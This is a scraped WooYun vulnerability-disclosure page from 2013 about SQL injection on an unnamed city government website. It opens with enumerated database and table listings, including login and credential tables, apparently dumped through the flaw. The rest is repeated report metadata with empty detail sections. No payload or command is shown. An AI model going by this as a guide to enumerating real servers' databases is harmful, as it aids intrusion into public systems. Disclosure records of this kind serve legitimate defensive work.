| logmarkhistory                             |
| mswebtasks                                 |
| restorefile                                |
| restorefilegroup                           |
| restorehistory                             |
| sqlagent_info                              |
| sysalerts                                  |
| syscachedcredentials                       |
| syscategories                              |
| sysconstraints                             |
| sysdbmaintplan_databases                   |
| sysdbmaintplan_history                     |
| sysdbmaintplan_jobs                        |
| sysdbmaintplans                            |
| sysdownloadlist                            |
| sysdtscategories                           |
| sysdtspackagelog                           |
| sysdtspackages                             |
| sysdtssteplog                              |
| sysdtstasklog                              |
| sysjobhistory                              |
| sysjobs                                    |
| sysjobs_view                               |
| sysjobschedules                            |
| sysjobservers                              |
| sysjobsteps                                |
| sysnotifications                           |
| sysoperators                               |
| syssegments                                |
| systargetservergroupmembers                |
| systargetservergroups                      |
| systargetservers                           |
| systargetservers_view                      |
| systaskids                                 |
| systasks                                   |
| systasks_view                              |
+--------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------+
| authors                                    |
| discounts                                  |
| employee                                   |
| jobs                                       |
| pub_info                                   |
| publishers                                 |
| roysched                                   |
| sales                                      |
| stores                                     |
| sysconstraints                             |
| syssegments                                |
| titleauthor                                |
| titles                                     |
| titleview                                  |
+--------------------------------------------+
Database: master
[36 tables]
+--------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS       |
| INFORMATION_SCHEMA.COLUMNS                 |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  |
| INFORMATION_SCHEMA.DOMAINS                 |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS      |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        |
| INFORMATION_SCHEMA.PARAMETERS              |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES                |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         |
| INFORMATION_SCHEMA.SCHEMATA                |
| INFORMATION_SCHEMA.TABLES                  |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        |
| INFORMATION_SCHEMA.VIEWS                   |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        |
| MSreplication_options                      |
| spt_datatype_info                          |
| spt_datatype_info_ext                      |
| spt_fallback_db                            |
| spt_fallback_dev                           |
| spt_fallback_usg                           |
| spt_monitor                                |
| spt_provider_types                         |
| spt_server_info                            |
| spt_values                                 |
| sysconstraints                             |
| syslogins                                  |
| sysoledbusers                              |
| sysopentapes                               |
| sysremotelogins                            |
| syssegments                                |
+--------------------------------------------+
Database: xzqlgktmw1
[37 tables]
+--------------------------------------------+
| By_GetNextID                               |
| bigclass                                   |
| by_admin                                   |
| by_bumen                                   |
| by_danwei                                  |
| by_flag                                    |
| by_juese                                   |
| by_mudi                                    |
| by_send_file                               |
| by_zhiwu                                   |
| cfgk                                       |
| degk                                       |
| djgk                                       |
| dsgk_bszn_list                             |
| dsgk_danye                                 |
| dsgk_ggl_list                              |
| dsgk_gzdt_list                             |
| dsgk_gzjl_list                             |
| dsgk_jcgg_list                             |
| dsgk_ldjh_list                             |
| dsgk_ldjs_list                             |
| dsgk_qsgg_list                             |
| dsgk_rdfk_list                             |
| dsgk_sszc_list                             |
| dsgk_wsjb                                  |
| dsgk_xgwj_list                             |
| dsgk_zlxz_list                             |
| dsgk_zqml_leibie                           |
| dsgk_zqml_list                             |
| dtproperties                               |
| icon                                       |
| jmgk                                       |
| lanmu                                      |
| mail                                       |
| smallclass                                 |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------+
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: kfqgsj
[44 tables]
+--------------------------------------------+
| By_GetNextID                               |
| ComSet                                     |
| InBox                                      |
| ONCall                                     |
| OutBox                                     |
| Report                                     |
| SendedOutBox                               |
| badoutbox                                  |
| bigclass                                   |
| by_admin                                   |
| by_biaogexiazai_lei                        |
| by_biaogexiazai_list                       |
| by_bumen                                   |
| by_chanpin_lei0                            |
| by_chanpin_lei1                            |
| by_danwei                                  |
| by_danye                                   |
| by_danye_lei                               |
| by_dengjizhinan_lei                        |
| by_dengjizhinan_list                       |
| by_flag                                    |
| by_gongshangdongtai_list                   |
| by_jiari                                   |
| by_jiari_shijian                           |
| by_juese                                   |
| by_mudi                                    |
| by_scjg_zxzx                               |
| by_send_file                               |
| by_shichangjianguan_list                   |
| by_shipinanquan_list                       |
| by_spaq_zxzx                               |
| by_tongzhigonggao_list                     |
| by_tszx                                    |
| by_xzqlgktm_list                           |
| by_zcdj_zxzx                               |
| by_zhengcefagui_list                       |
| by_zhiwu                                   |
| by_zhucedengji_list                        |
| dtproperties                               |
| icon                                       |
| lanmu                                      |
| smallclass                                 |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
Database: Northwind
[31 tables]
+--------------------------------------------+
| Categories                                 |
| CustomerCustomerDemo                       |
| CustomerDemographics                       |
| Customers                                  |
| EmployeeTerritories                        |
| Employees                                  |
| Invoices                                   |
| Orders                                     |
| Products                                   |
| Region                                     |
| Shippers                                   |
| Suppliers                                  |
| Territories                                |
| Alphabetical list of products              |
| Category Sales for 1997                    |
| Current Product List                       |
| Customer and Suppliers by City             |
| Order Details Extended                     |
| Order Details                              |
| Order Subtotals                            |
| Orders Qry                                 |
| Product Sales for 1997                     |
| Products Above Average Price               |
| Products by Category                       |
| Quarterly Orders                           |
| Sales Totals by Amount                     |
| Sales by Category                          |
| Summary of Sales by Quarter                |
| Summary of Sales by Year                   |
| sysconstraints                             |
| syssegments                                |
+--------------------------------------------+
修复方案：

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

危害等级：高
漏洞Rank：11
确认时间：2013-12-15 21:42
WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045102

漏洞标题：某市政府网站SQL注射

相关厂商：某市政府网站

漏洞作者： Manning

提交时间：2013-12-11 16:04

修复时间：2014-01-25 16:05

公开时间：2014-01-25 16:05

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-045102

漏洞标题：某市政府网站SQL注射

相关厂商：某市政府网站

漏洞作者： Manning

提交时间：2013-12-11 16:04

修复时间：2014-01-25 16:05

公开时间：2014-01-25 16:05

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-045102"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Manning@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：
